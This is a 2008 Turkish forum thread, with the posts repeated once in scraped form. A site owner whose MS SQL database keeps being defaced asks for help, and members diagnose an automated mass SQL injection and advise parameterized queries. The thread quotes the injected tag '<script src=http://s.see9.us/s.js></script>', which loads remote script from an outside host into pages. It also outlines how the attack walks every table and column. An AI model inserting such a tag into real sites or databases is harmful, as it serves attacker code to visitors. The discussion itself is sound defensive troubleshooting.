Sql Hack

pppzze · 13.05.2008

Selamlar,

Son 1 haftadır hemen hemen hergün, SQL server ımız hackleniyor...

Tüm tabloların string alanlarına
<script src=http://s.see9.us/s.js></script>

kodu ekleniyor... Siteyle bağlantılı olsun veya olmasın o veritabanında hangi tablolar varsa bu kod ekleniyor...

Mesela TbThisDate tablosu daha önce açılmış ama hiç kullanılmamış unutulmuş bir tablo ona bile eklenmiş bu kod...

SQL Loglarını takip ettiğimde Not Trusted Connection ile bağlanmış...

SQL server ın uzaktan bağlantısı kapalı hatta network bağlantısı bile kapalı.. Yani aynı networkteki makine ip yazarak bağlanamıyor...

Bu sorunu nasıl çözerim bir öneri vereiblirmisiniz??

mow · 13.05.2008

Daha önce rastgele bir isimle sayfaya js çağıran wormlar görmüştüm, ancak seninki gibi sabit bir isimde olanını görmemiştim. Google a "s.see9.us/s.js" yazdığında bir tane Türkçe site ve yüzlerce Çince site gözüküyor, çinliler fena kapılmış demek ki

mssql ile ilgili gibi gözüküyor, güvenlik sitelerinde mutlaka bununla ilgili bir bildiri vardır onları bir araştır istersen.

pppzze · 13.05.2008

Selam mow yanıtın için teşekkür ederim..

Evet 1 tane türkçe sitesi aynı poblemle boğuşuyor anlaşılan.. Sanırım site öylesine bıkmışki artık yedeğini yükleyemiyor...

Biz ama hala bıkmadık ve onlar veritabanını patakladıkça biz yedeğini yükleyip duruyoruz..

İlk tespitimizde, 2 sitede (biz ve diğer türk sitesi) ASP.net kullanılarak yazılmış..
Aklımıza ASP.net ile yazarken gözden kaçırdığımız bir nokta varmı sorusu geliyor..

Log incelememizde 69... ce 210.. ile başlayan ip lerle not trusted connection sağlanarak bu saldırı yapılıyor... Bizim sitemiz ise veritabanına bağlanırken trusted connection oluyor.. Yani sitedeki kayıt ve sorgulama form larını kullanarak bunu yapmış olabildikleri çokta olası gelmiyor...

Öte yandan çin siteleride bu saldırıya maruz kaldığı için yabancı birilerinin bu saldırıyı gerçekleştirdiğini düşünüyoruz.. Yabancı biri bize niye saldırır onuda anlamak güç Çünkü 2-3 saat arayla düzelmişse tekrar saldırıyor...

Fikri olan varsa yada önerisi paylaşsın lütfen..

Herkese şimdiden teşekkürler..

mow · 13.05.2008

İçeriden olma ihtimalini hiç düşünmüş müydün? En son sunucuya ne kurup ne çalıştırdığını gözden geçirmeni tavsiye ederim.

mow · 13.05.2008

stormplayer sana bir şey ifade ediyor mu? streaming ile ilgili bir şey var mı?

soul · 13.05.2008

Bu son zamanlardaki bir toplu saldiri sonucu,

Sitende %99 olarak SQL Injection var o sorunu cozmen gerekiyor, ve malkumdur ki sitede SQL Injection olmasi demek baskalarinin da exploti edebilecegi anlamina geliyor.

pppzze · 13.05.2008

Selam,

mow , stromplayter nedir daha önce duymadım ama sitede stream yok.. Sitenin tek yaptığı, veritabanından verileri çekmek..

soul öncelik yanıtın için teşekkürler.. Son zamanlar toplu saldırılar yaşanıyorda bu salsırılar türkiyeden sadece 2 siteye patlamış olamaz sanırım.

SQL Injecktiondan bizde şüphelendik ama

hiç kullanılmayan bir tabloya verileri nasıl kaydettiğini anlamadım..

Yani SQL injecktionla bir storde procedure çalıştırıyor olması lazım...

Örn.. select * from sys.tables (tablo isimlerini al)
select * from sys.columns (kolon isimlerini al) daha sonra tipleri al içine verileri gir...

SQL injecktionla tüm bunları çalışıtırabilir mi??

Birde not trusted bağlantı diyor.. SQL injecktion olsaydı, trusted bağlantı olması lazım değilmiydi??

soul · 13.05.2008

Alıntı:

pppzze tarafından gönderilen mesaj:

soul öncelik yanıtın için teşekkürler.. Son zamanlar toplu saldırılar yaşanıyorda bu salsırılar türkiyeden sadece 2 siteye patlamış olamaz sanırım.

Olabilir, cunku onlarin yaptigi soyle bir sey:

Googledan icerisinde ?ID=1 gecen sonuclari bul, Otomatik olarak SQL Injection dene.

SQL Injection varsa her tabloya kayit yapabilirler. Trusted Connection a gelince, SQL server portu disariya acik mi?

Alıntı:

Örn.. select * from sys.tables (tablo isimlerini al)
select * from sys.columns (kolon isimlerini al) daha sonra tipleri al içine verileri gir...

Yaptiklari tam olarak bu, tum tablolarda belli data tipi olan alanlara bu kodu ekliyorlar.

Alıntı:

Birde not trusted bağlantı diyor.. SQL injecktion olsaydı, trusted bağlantı olması lazım değilmiydi??

web sitesinin SQL server nasil baglandigina bagli bir durum, bir de bu baglantinin bu sonuca neden olan baglanti oldugundan emin misiniz? Acikcasi soyleyeyim ben sorunun %99 SQL Injectiondan kaynaklandigina eminim.

Ozellikle ID parametesi gecen sayfalara dikkat edin.

pppzze · 13.05.2008

Selam soul,

benimde içimde biryerlerde SQL injection olduğunu düşünüyorum..

Öncelikle URLREWRİTE ile yazılmış domainler yani id=1 gibi bir kayıt yerine

32334_Istanbul_Maltepe_KiralikDaire.HTML şeklide adres satırları var..

site SQL server a kullanıcı adı ve şifre işle bağlanıyor... Trusted connection ile.. ve server a bağlantı kurabilmek için, localhost yazılmalı.. Yani srverın IP yazılsa bile bağlnatı iptal ediliyor..

SQL injection la olsaydı bağlantıların trusted olması lazım değilmi.. Ama saldırılar not trusted bağlantılı

İşin sonunda, tüm kayıt formlarına resimdeki yazıyı kutulara girdireceğim... Bu da başka çalışmalar, türkiyenin ve kendi gelişimim için harcayacağım enerjimi, saldırmasınlar diye harcamak anlamına gelecek...

Sence nasıl bağlanmalıyız yani bağlantı stringimiz ne olmalı vede, SQL injectiondan korunmak için bir önerin varmı?

Yaıntların için teşekkür ederim

soul · 13.05.2008

- Bu datayi girenlerin Trusted Connection yapmadigini nerden biliyorsun? Nasil bir loga dayaranak soyluyorsun?
- SQL Injection dan korunmak icin parameterized query kullanabilirsin
- Ayni DB yi kullanan baska websiteleri varsa ve ayni kullanici ile baglaniyorsa onalrdan biri hacklenmis ve o da olabilmis olabilir.
- web server loglarinda SQL Injection a benzer bir sey aradin mi? Bu kayitlari aradin mi?

13.05.2008	#1 (permalink)
pppzze Üyelik Tarihi: 10.08.2006 Yer: Istanbul Mesaj: 69	Sql Hack Selamlar, Son 1 haftadır hemen hemen hergün, SQL server ımız hackleniyor... Tüm tabloların string alanlarına <script src=http://s.see9.us/s.js></script> kodu ekleniyor... Siteyle bağlantılı olsun veya olmasın o veritabanında hangi tablolar varsa bu kod ekleniyor... Mesela TbThisDate tablosu daha önce açılmış ama hiç kullanılmamış unutulmuş bir tablo ona bile eklenmiş bu kod... SQL Loglarını takip ettiğimde Not Trusted Connection ile bağlanmış... SQL server ın uzaktan bağlantısı kapalı hatta network bağlantısı bile kapalı.. Yani aynı networkteki makine ip yazarak bağlanamıyor... Bu sorunu nasıl çözerim bir öneri vereiblirmisiniz?? __________________ emlak ucuz ürünler akın

13.05.2008	#2 (permalink)
mow Üyelik Tarihi: 28.03.2003 Yer: İzmir Yaş: 25 Mesaj: 719	Re: Sql Hack Daha önce rastgele bir isimle sayfaya js çağıran wormlar görmüştüm, ancak seninki gibi sabit bir isimde olanını görmemiştim. Google a "s.see9.us/s.js" yazdığında bir tane Türkçe site ve yüzlerce Çince site gözüküyor, çinliler fena kapılmış demek ki mssql ile ilgili gibi gözüküyor, güvenlik sitelerinde mutlaka bununla ilgili bir bildiri vardır onları bir araştır istersen. __________________ #siberarena.com \| tournament.online

13.05.2008	#3 (permalink)
pppzze Üyelik Tarihi: 10.08.2006 Yer: Istanbul Mesaj: 69	Re: Sql Hack Selam mow yanıtın için teşekkür ederim.. Evet 1 tane türkçe sitesi aynı poblemle boğuşuyor anlaşılan.. Sanırım site öylesine bıkmışki artık yedeğini yükleyemiyor... Biz ama hala bıkmadık ve onlar veritabanını patakladıkça biz yedeğini yükleyip duruyoruz.. İlk tespitimizde, 2 sitede (biz ve diğer türk sitesi) ASP.net kullanılarak yazılmış.. Aklımıza ASP.net ile yazarken gözden kaçırdığımız bir nokta varmı sorusu geliyor.. Log incelememizde 69... ce 210.. ile başlayan ip lerle not trusted connection sağlanarak bu saldırı yapılıyor... Bizim sitemiz ise veritabanına bağlanırken trusted connection oluyor.. Yani sitedeki kayıt ve sorgulama form larını kullanarak bunu yapmış olabildikleri çokta olası gelmiyor... Öte yandan çin siteleride bu saldırıya maruz kaldığı için yabancı birilerinin bu saldırıyı gerçekleştirdiğini düşünüyoruz.. Yabancı biri bize niye saldırır onuda anlamak güç Çünkü 2-3 saat arayla düzelmişse tekrar saldırıyor... Fikri olan varsa yada önerisi paylaşsın lütfen.. Herkese şimdiden teşekkürler.. __________________ emlak ucuz ürünler akın

13.05.2008	#4 (permalink)
mow Üyelik Tarihi: 28.03.2003 Yer: İzmir Yaş: 25 Mesaj: 719	Re: Sql Hack İçeriden olma ihtimalini hiç düşünmüş müydün? En son sunucuya ne kurup ne çalıştırdığını gözden geçirmeni tavsiye ederim. __________________ #siberarena.com \| tournament.online

13.05.2008	#5 (permalink)
mow Üyelik Tarihi: 28.03.2003 Yer: İzmir Yaş: 25 Mesaj: 719	Re: Sql Hack stormplayer sana bir şey ifade ediyor mu? streaming ile ilgili bir şey var mı? __________________ #siberarena.com \| tournament.online

13.05.2008	#6 (permalink)
soul Üyelik Tarihi: 13.07.2000 Yer: LND Mesaj: 4,251	Re: Sql Hack Bu son zamanlardaki bir toplu saldiri sonucu, Sitende %99 olarak SQL Injection var o sorunu cozmen gerekiyor, ve malkumdur ki sitede SQL Injection olmasi demek baskalarinin da exploti edebilecegi anlamina geliyor. __________________ FERRUH.MAVİTUNA - Okuduklarim 3-5-7 zotoro ucgeni

13.05.2008	#7 (permalink)
pppzze Üyelik Tarihi: 10.08.2006 Yer: Istanbul Mesaj: 69	Re: Sql Hack Selam, mow , stromplayter nedir daha önce duymadım ama sitede stream yok.. Sitenin tek yaptığı, veritabanından verileri çekmek.. soul öncelik yanıtın için teşekkürler.. Son zamanlar toplu saldırılar yaşanıyorda bu salsırılar türkiyeden sadece 2 siteye patlamış olamaz sanırım. SQL Injecktiondan bizde şüphelendik ama hiç kullanılmayan bir tabloya verileri nasıl kaydettiğini anlamadım.. Yani SQL injecktionla bir storde procedure çalıştırıyor olması lazım... Örn.. select * from sys.tables (tablo isimlerini al) select * from sys.columns (kolon isimlerini al) daha sonra tipleri al içine verileri gir... SQL injecktionla tüm bunları çalışıtırabilir mi?? Birde not trusted bağlantı diyor.. SQL injecktion olsaydı, trusted bağlantı olması lazım değilmiydi?? __________________ emlak ucuz ürünler akın

13.05.2008	#9 (permalink)
pppzze Üyelik Tarihi: 10.08.2006 Yer: Istanbul Mesaj: 69	Re: Sql Hack Selam soul, benimde içimde biryerlerde SQL injection olduğunu düşünüyorum.. Öncelikle URLREWRİTE ile yazılmış domainler yani id=1 gibi bir kayıt yerine 32334_Istanbul_Maltepe_KiralikDaire.HTML şeklide adres satırları var.. site SQL server a kullanıcı adı ve şifre işle bağlanıyor... Trusted connection ile.. ve server a bağlantı kurabilmek için, localhost yazılmalı.. Yani srverın IP yazılsa bile bağlnatı iptal ediliyor.. SQL injection la olsaydı bağlantıların trusted olması lazım değilmi.. Ama saldırılar not trusted bağlantılı İşin sonunda, tüm kayıt formlarına resimdeki yazıyı kutulara girdireceğim... Bu da başka çalışmalar, türkiyenin ve kendi gelişimim için harcayacağım enerjimi, saldırmasınlar diye harcamak anlamına gelecek... Sence nasıl bağlanmalıyız yani bağlantı stringimiz ne olmalı vede, SQL injectiondan korunmak için bir önerin varmı? Yaıntların için teşekkür ederim __________________ emlak ucuz ürünler akın

13.05.2008	#10 (permalink)
soul Üyelik Tarihi: 13.07.2000 Yer: LND Mesaj: 4,251	Re: Sql Hack - Bu datayi girenlerin Trusted Connection yapmadigini nerden biliyorsun? Nasil bir loga dayaranak soyluyorsun? - SQL Injection dan korunmak icin parameterized query kullanabilirsin - Ayni DB yi kullanan baska websiteleri varsa ve ayni kullanici ile baglaniyorsa onalrdan biri hacklenmis ve o da olabilmis olabilir. - web server loglarinda SQL Injection a benzer bir sey aradin mi? Bu kayitlari aradin mi? __________________ FERRUH.MAVİTUNA - Okuduklarim 3-5-7 zotoro ucgeni